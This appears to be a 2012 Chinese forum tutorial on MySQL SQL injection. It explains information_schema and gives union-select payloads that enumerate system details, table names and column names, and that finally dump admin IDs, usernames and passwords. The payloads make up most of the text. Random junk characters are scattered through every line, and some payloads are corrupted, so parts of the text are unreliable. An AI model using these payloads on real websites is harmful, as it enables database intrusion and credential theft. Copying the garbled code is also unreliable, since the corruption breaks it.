本文介绍MYSQL盲注的一些语句和方法$ \; X& _- }, h; U: X3 i
; \0 [( J# U% a" b
学习盲注前先了解下 IFORMATION_SCHEMA 库& d: v0 k; M0 `! g5 w. a7 o9 k. l4 v6 H
; m' N+ b2 K: r2 O8 p6 K
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有
+ N0 u+ n9 |1 b$ d X存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。
% o% z `4 }+ R/ Y$ W/ H2 V3 }! G# ~1.得到所有数据库名:
+ Y7 ?& S0 L& U# L, `4 U8 I" L( d|SCHEMATA ->存储数据库名的表! Z9 {$ e( h; d% E; M+ C* c
|---字段:SCHEMA_NAME ->数据库名称
5 l" r9 {9 {; m' h
$ w, K& p2 w* x$ x" S- C9 c) ~* o4 r|TABLES ->存储表名0 S6 h( F- R/ _8 Z1 U- G4 c1 d
|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名
" t9 q% H$ r8 V|---字段:TABLE_NAME ->存储表的表名9 o. h. c1 H- D! Q
! i, o0 f# }0 L9 j
|COLUMNS ->存储的字段名表
4 h" G, W& D/ G/ x; `! L9 H|---字段:TABLE_SCHEMA ->该字段所属数据库名
* r& q' r- t0 H|---字段:TABLE_NAME ->存储所属表的名称
6 Y! X C# d2 d
% o, p* G# U! I|---字段:COLUMN_NAME ->该字段的名称! U/ W8 a8 y2 i" G x. G0 {# h
; I, b: Q; I* v9 K% P 4 |! ]4 M6 A! U: M8 }) p
2 `/ n( D1 Q. \% D G( E5 l
########################################################################### z8 M, E ^4 \# N0 M
0 [- R H; s- Q' U1 Y8 B6 m$ h9 S0x001 获取系统信息:: Q! p- y) R6 r# ]
/ I8 |! r% o% `8 T) H4 dunion select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /** A; {" `' T+ d# i' g* u
/ y% ~7 z# N7 d0 k1 Z8 R
/*
% O" u+ t- [8 `) ~4 D/ c5 ?& m! ^
7 o$ |) A/ h+ E8 O8 h7 Y3 f5 X% G6 c@@global.version_compile_os 获取系统版本
1 g& O$ X, s3 K( J
, d6 Y% p* {) S@@datadir 数据库路径 \5 v+ _- }2 N* N! P9 Q
database() 当前数据库名称1 a9 E+ i X" Y
0x3c62723e 换行HEX值4 X- \) v- N/ L+ m7 y( A
2 D3 ]. X+ ?, k: i( x*/2 D% B7 f+ S, j8 }
9 W9 T2 R! z y# m) q
4 H7 Q" w- n; o& L7 v& X, t2 b. V% n) m3 }4 i
######################################################################8 s! d8 E0 L8 |9 T9 ~2 E7 J) a- |
+ w7 q+ I) j& { `: p/ ^+ s6 n0x002 获取表名
0 m! r* C3 D3 B6 l+ W0 I# [( S3 [/ c) w7 |# g+ V0 s
union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*% i4 d% s" Q! \/ {2 _, H. n
* t9 I6 |0 n* K6 s . ?6 T L% {* n5 y
& C9 f3 d' G$ |
/*
. W; @) S+ `, F. u/ C$ x- X
8 w- m+ g. D$ O$ o: M0x67617264656e 为当前数据库名
3 q+ Q" \" `" Z! k8 {1 [1 a m" a8 b
v# T/ M7 H) c2 H; ^group_concat(table_name) 使用group_concat函数 一步获得该库所有表名
- _7 u& t, s: k; v% v2 S; [5 Y% b# P/ u
*/
( F7 ?! Q" x1 }
2 p$ x* B2 m% `6 L( _0 N8 Q0 L: A5 a######################################################################& ^1 [5 O8 p, e) w" k% u
$ |5 _7 O' `& d" n! @* A 4 d* z' B( t& w, P1 ^5 r
& I5 K9 j0 K+ V" e5 a0 t# _
0x003 获取字段
9 |) Y, t: K7 f1 `6 s9 f% ~3 C/ q
- n+ ^* `7 A5 }+ P: [7 gunion select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*3 y: S; s; x; k) b# r( o, \
* O4 _/ B& Y- s+ e1 V! I! q/*( R: f- j* K3 Z7 Z, X) U' z
$ \) E2 J: T+ D( A
group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段( c0 w, q$ T1 z- v! B4 G q3 ^- i
5 `5 B8 K9 M# K- h/ l0x61646d696e ->选择一个表
* ^& l3 V9 Z. u; o( n# N' k& t# _$ {/ q; J3 R: G* E
0x67617264656e ->数据库名- @. B$ |! T, J0 z: \8 V! H
7 @+ o6 Z" N' h+ ?- Z5 a+ I*/; y& [8 ]8 }( r+ g! u# S
O; |. G# }5 P. w1 V/ K* R: g0 {/ X+ h
#####################################################################
; x4 s6 F+ m5 m C: Z
/ v9 _+ V0 C4 z: p5 [
2 {! C% C# f* l P8 n4 O+ }2 X% W0 \; X8 Q1 m
0x004 获取数据
1 w1 _. j& @' ~+ l* ^
3 F" B8 L8 N7 n+ Q( K4 T* q& [union select 1,2,35 {8 z9 B* O2 @. a1 s5 K. D
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin/ c5 F3 @0 k& x
6 b! P: }4 C0 j* o- C2 @
union select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin
! H: W- d0 ^# j1 v( l. U) H4 M% [8 {3 n" J1 D1 k2 u. W% V
- ? O5 g3 [4 R- u0 f
D" Z7 ~) N8 T0 b' _/ A8 y
/*
: @+ g# t7 d! a2 [/ X5 y) F' X) U% s' y6 z& E
0x3c62723e 换行符号HEX编码
" V0 F4 w D3 `, M$ E$ y
) E2 Y) _, a) m/ J' h! fgroup_concat 同时获得该字段所有数据
" i( n" C- h7 p+ u5 _; X
/ B; Z& `9 A* ~6 ~*/
* S* k; }# a% E' j! z
0 o5 v2 H* {1 E3 J3 u) \. P |
发表于 2012-9-13 17:48:44
收藏
支持
反对